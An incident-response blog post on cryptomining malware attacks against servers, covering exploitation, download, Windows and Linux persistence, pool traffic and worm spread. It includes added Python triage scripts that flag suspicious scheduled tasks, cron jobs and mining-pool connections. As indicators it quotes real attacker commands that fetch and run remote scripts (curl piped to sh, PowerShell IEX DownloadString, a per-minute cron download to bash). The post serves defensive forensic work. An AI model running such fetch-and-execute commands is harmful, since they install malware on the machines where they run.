Responding to Mining Malware Attacks against Servers

Forensic Labs · Cloud Forensics · Jun 13, 2018

A large number of server-side exploits have been used over the last year to install cryptocurrency mining malware. Below we’ve outlined the typical stages of a mining malware attack against a server, and the steps you may want to take during forensics and incident response.

We’ve built a platform to automate incident response and forensics in AWS/Azure/GCP — you can grab a free trial here. You can also download a free playbook we’ve written on how to respond to security incidents in AWS.

Exploitation

You may see records of the original exploit within web-server or application logs.

Download

Following exploitation, an installation script is typically downloaded and executed in one step, such as:

curl -s http://149.255.35[.]91/larva.sh |sh

Or on Windows:

powershell IEX (New-Object Net.WebClient).DownloadString('http://158.69.133.17:8220/1.ps1')

If you’re lucky enough to have them, you can also check PowerShell and Sysmon logs for this activity.

Installation & Persistence — Windows

Scheduled tasks are commonly used. For example, the Retadup mining worm creates a scheduled task that runs its executable every minute:

schtasks /create /sc minute /mo 1 /tn bqspogcjposfemiigrgmk /tr "C:\bqspogcjposfemiigrgmk\bqspogcjposfemiigrgmk.exe"

Scheduled tasks are stored at:

C:\Windows\Tasks
C:\Windows\System32\Tasks
C:\Windows\SysWow64\Tasks

These task files are parsed by tools such as Log2Timeline, and task creation and execution are also recorded in the Event Logs.
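When working from a disk image rather than a live system, the task files under C:\Windows\System32\Tasks are plain XML and can be triaged directly. The following is an added example (not code from the original post or from any of the tools it names) that parses one such file and flags the traits of the Retadup task above: a repeat interval of a minute or less, an action outside the usual program directories, and a long generated-looking name. The sample task XML is constructed to match the schtasks command quoted above, and the trusted directory list is a hypothetical allow-list you would tune for your own estate.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML files under C:\Windows\System32\Tasks
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
NS = {"t": TASK_NS}

# Hypothetical allow-list: directories where a legitimate task action usually lives
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample modelled on the Retadup schtasks command. Real task files on
# disk are UTF-16 with an XML declaration; decode them to str before parsing.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\bqspogcjposfemiigrgmk</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <StartBoundary>2018-06-13T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>"C:\\bqspogcjposfemiigrgmk\\bqspogcjposfemiigrgmk.exe"</Command></Exec>
  </Actions>
</Task>
"""


def iso_duration_seconds(value):
    """Convert an ISO 8601 duration such as PT1M or P1DT2H to seconds (None if unparsable)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def triage_task(xml_text):
    """Extract task name, command and shortest repeat interval; list why it looks suspicious."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    name = uri.rsplit("\\", 1)[-1]
    command = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS)
    command = command.strip().strip('"')
    intervals = [iso_duration_seconds(el.text) for el in root.iter("{%s}Interval" % TASK_NS)]
    shortest = min((i for i in intervals if i is not None), default=None)

    reasons = []
    # Re-running every minute or faster is typical of a miner keeping itself alive
    if shortest is not None and shortest <= 60:
        reasons.append("short-repeat")
    # Action binary outside the usual program directories
    if command and not command.lower().startswith(TRUSTED_DIRS):
        reasons.append("unusual-path")
    # Long runs of lowercase letters with no separators are often machine-generated
    if re.fullmatch(r"[a-z]{16,}", name):
        reasons.append("random-name")
    return {"name": name, "command": command, "interval_seconds": shortest, "reasons": reasons}


if __name__ == "__main__":
    print(triage_task(SAMPLE_TASK_XML))
```

To run this over a mounted image, walk the Tasks directory, read each file as UTF-16 and pass the decoded text to `triage_task`; a task with two or more reasons is worth pulling the referenced binary for hashing and anti-virus scanning.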

Installation & Persistence — Linux

Mining malware is typically installed via a Bash script post-exploitation. It then persists through cron jobs, with an entry such as:

* * * * * curl -s http://dangerousdesigns[.]org/logo.jpg | bash -s

This downloads a bash script to re-install the malware every minute, and executes it via bash. You can check for cron jobs in /etc/crontab, /etc/cron.d/ and /var/spool/cron/.

You can also check /var/log/syslog for executed cron jobs, for example:

Dec 24 02:10:01 node23 CRON[5283]: (root) CMD ( /usr/sbin/monero)
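Both checks above, the crontab review and the syslog review, reduce to the same question: does a cron command download-and-pipe to a shell, or launch something named like a miner? The following added example (not code from the original post) applies those two heuristics to a constructed crontab and a constructed /var/log/syslog excerpt that includes the CRON line quoted above. The pipe-to-shell pattern and the miner keyword list are assumptions you would extend from your own case data; note that /etc/crontab and files in /etc/cron.d/ carry a user column after the schedule, handled by the `has_user_field` flag.

```python
import re

# Constructed sample of a user crontab (/var/spool/cron/<user>) with the entry quoted above
SAMPLE_CRONTAB = """# m h dom mon dow command
MAILTO=root
0 6 * * * /usr/bin/apt-get update >/dev/null 2>&1
* * * * * curl -s http://dangerousdesigns[.]org/logo.jpg | bash -s
"""

# Constructed /var/log/syslog excerpt; the second line is the one quoted in the text
SAMPLE_SYSLOG = """Dec 24 02:05:01 node23 CRON[5101]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Dec 24 02:10:01 node23 CRON[5283]: (root) CMD ( /usr/sbin/monero)
Dec 24 02:17:01 node23 CRON[5344]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
"""

# Heuristics (assumed, not exhaustive): download piped into a shell, and miner-like names
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
MINER_WORDS = ("monero", "xmr", "minerd", "stratum")
CRON_LOG = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) CRON\[(?P<pid>\d+)\]: "
                      r"\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")


def suspicious_reasons(command):
    """Return why a cron command looks like miner install/persistence (empty if it does not)."""
    reasons = []
    if PIPE_TO_SHELL.search(command):
        reasons.append("pipe-to-shell")
    if any(word in command.lower() for word in MINER_WORDS):
        reasons.append("miner-name")
    return reasons


def parse_crontab(text, has_user_field=False):
    """Yield (schedule, command) per job line, skipping comments and VAR=value lines."""
    n_fields = 6 if has_user_field else 5   # system crontabs insert a user column
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, n_fields)
        if len(fields) <= n_fields:
            continue  # malformed, or an @reboot-style shortcut not handled here
        yield " ".join(fields[:5]), fields[n_fields]


def flag_crontab(text, has_user_field=False):
    """List the jobs in a crontab that trip at least one heuristic."""
    hits = []
    for schedule, command in parse_crontab(text, has_user_field):
        reasons = suspicious_reasons(command)
        if reasons:
            hits.append({"schedule": schedule, "command": command, "reasons": reasons})
    return hits


def flag_syslog(text):
    """List CRON execution records in syslog whose command trips a heuristic."""
    hits = []
    for line in text.splitlines():
        m = CRON_LOG.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        reasons = suspicious_reasons(cmd)
        if reasons:
            hits.append({"time": m.group("ts"), "host": m.group("host"), "pid": int(m.group("pid")),
                         "user": m.group("user"), "command": cmd, "reasons": reasons})
    return hits


if __name__ == "__main__":
    print(flag_crontab(SAMPLE_CRONTAB))
    print(flag_syslog(SAMPLE_SYSLOG))
```

The syslog hits give you the execution timestamps, which is what you need to anchor the miner's first run in a timeline and to decide how far back to look in the web-server logs for the original exploit.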

Mining

Review network traffic (flow records, DNS and proxy logs) for connections to mining pool domains.

Most mining malware, and the mining software itself, is detected well by anti-virus.

YARA rules are also available that can be used to find mining software on disk and in memory.
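A quick first pass over connection records, as an added example that is not part of the original post: it flags destinations on ports commonly used by Stratum mining pools and hostnames that contain pool-like words, then counts hits per internal source so that the infected server stands out. The port set and the word list are constructed heuristics, not a curated feed, and the connection records are constructed sample data using documentation addresses and example domains.

```python
import re
from collections import Counter

# Constructed watch-list of ports often used by Stratum mining pools (heuristic, not exhaustive)
STRATUM_PORTS = {3333, 4444, 5555, 7777, 8888, 14444, 14433}
# Substrings that often appear in pool hostnames (heuristic)
POOL_WORDS = ("pool", "xmr", "monero", "stratum", "mining")

# Constructed connection records: ts,src,dst (hostname if resolved, else IP),dport
SAMPLE_CONNECTIONS = """ts,src,dst,dport
1529861400,10.0.1.23,deb.debian.org,443
1529861407,10.0.1.23,xmr-pool.example.net,4444
1529861410,10.0.1.23,203.0.113.10,3333
1529861415,10.0.1.40,api.example.com,443
"""

CONN = re.compile(r"^(?P<ts>\d+),(?P<src>[^,]+),(?P<dst>[^,]+),(?P<dport>\d+)$")


def classify_destination(dst, dport):
    """Return the heuristics a destination trips (empty list if none)."""
    reasons = []
    if dport in STRATUM_PORTS:
        reasons.append("stratum-port")
    host = dst.lower()
    # Only apply the name heuristic to real hostnames, not bare IP addresses
    if not re.fullmatch(r"[\d.]+", host) and any(w in host for w in POOL_WORDS):
        reasons.append("pool-name")
    return reasons


def flag_connections(csv_text):
    """Parse CSV connection records and keep those that look like pool traffic."""
    hits = []
    for line in csv_text.splitlines()[1:]:  # skip the header row
        m = CONN.match(line.strip())
        if not m:
            continue
        dport = int(m.group("dport"))
        reasons = classify_destination(m.group("dst"), dport)
        if reasons:
            hits.append({"ts": int(m.group("ts")), "src": m.group("src"),
                         "dst": m.group("dst"), "dport": dport, "reasons": reasons})
    return hits


def hits_by_source(hits):
    """Count flagged connections per internal source to find the infected host."""
    return dict(Counter(h["src"] for h in hits))


if __name__ == "__main__":
    flagged = flag_connections(SAMPLE_CONNECTIONS)
    print(flagged)
    print(hits_by_source(flagged))
```

A bare IP on a Stratum-style port with no hostname is a weaker signal than a pool-like name, so it is worth resolving it against DNS logs from the same window before acting on it.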

Lateral Movement

Some mining malware acts as a worm. Typically it spreads within networks NotPetya-style, using EternalBlue and Mimikatz.

We’ve created a new tool to automate investigating and responding to security incidents in AWS and Azure — you can get a free trial here.
